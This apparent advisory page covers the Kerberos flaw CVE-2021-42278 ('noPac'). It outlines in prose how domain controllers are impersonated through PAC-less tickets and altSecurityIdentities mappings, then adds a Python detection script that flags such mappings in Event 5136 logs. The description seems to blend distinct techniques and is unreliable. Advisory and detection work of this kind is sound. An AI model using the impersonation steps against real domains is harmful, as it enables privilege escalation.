noPac - CVE-2021-42278
Release Date: Nov 9, 2021
Impact: Elevation of Privilege
CVSS score: 8.8
Affected products
This CVE is a security bypass vulnerability that is caused by Kerberos’s PAC confusion and impersonation of domain controllers.
It allows potential attackers to impersonate domain controllers by requesting TGTs from Kerberos without a PAC; once a TGT is issued without a PAC, the attacker can impersonate a highly privileged user.
Getting a DC to add a PAC when a service ticket (ST) was requested using a TGT without a PAC was achieved by configuring the “altSecurityIdentities” attribute.
This process involves modifying the altSecurityIdentities attribute of an account in a foreign domain to Kerberos:[samaccountname]@[domain] to impersonate that user.
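A defender-side check for the attribute change described above, as an added example that is not part of the original page: it scans directory-change audit events (Event ID 5136) for Kerberos: name mappings added to altSecurityIdentities. It assumes directory service change auditing is enabled on the DCs; the function names, the sensitive_names list and all sample events are constructed for illustration.

```python
import re

VALUE_ADDED = "%%14674"  # OperationType code Windows logs for "Value Added"
MAPPING = re.compile(r"^kerberos:(?P<name>[^@\s]+)@(?P<realm>\S+)$", re.IGNORECASE)

def find_kerberos_mappings(events, sensitive_names=()):
    """Return a finding for each 5136 event that adds a Kerberos: mapping to
    altSecurityIdentities; 'high' when the mapped name is in sensitive_names."""
    sensitive = {n.lower().rstrip("$") for n in sensitive_names}
    findings = []
    for ev in events:
        if ev.get("EventID") != 5136:  # 5136: directory service object modified
            continue
        if ev.get("AttributeLDAPDisplayName", "").lower() != "altsecurityidentities":
            continue
        if ev.get("OperationType") != VALUE_ADDED:
            continue
        m = MAPPING.match(ev.get("AttributeValue", "").strip())
        if not m:
            continue  # other mapping types (e.g. X509:) are not what this check covers
        name = m.group("name")
        findings.append({
            "object": ev.get("ObjectDN"),
            "changed_by": ev.get("SubjectUserName"),
            "mapped_to": f"{name}@{m.group('realm')}",
            "severity": "high" if name.lower().rstrip("$") in sensitive else "review",
        })
    return findings

def _ev(event_id, who, dn, attr, value, op):
    return {"EventID": event_id, "SubjectUserName": who, "ObjectDN": dn,
            "AttributeLDAPDisplayName": attr, "AttributeValue": value, "OperationType": op}

# Constructed sample events: field names follow Event 5136, all values are made up.
SAMPLE_EVENTS = [
    _ev(5136, "svc-helpdesk", "CN=jdoe,CN=Users,DC=child,DC=example,DC=test",
        "altSecurityIdentities", "Kerberos:DC01@EXAMPLE.TEST", "%%14674"),
    _ev(5136, "admin-a", "CN=asmith,CN=Users,DC=example,DC=test",
        "altSecurityIdentities", "Kerberos:asmith@PARTNER.TEST", "%%14674"),
    _ev(5136, "admin-a", "CN=bwong,CN=Users,DC=example,DC=test",
        "altSecurityIdentities", "X509:constructed-cert-mapping", "%%14674"),
    _ev(5136, "admin-a", "CN=jdoe,CN=Users,DC=child,DC=example,DC=test",
        "altSecurityIdentities", "Kerberos:DC01@EXAMPLE.TEST", "%%14675"),  # value deleted
]

if __name__ == "__main__":
    for finding in find_kerberos_mappings(SAMPLE_EVENTS, ["DC01$", "Administrator"]):
        print(finding)
```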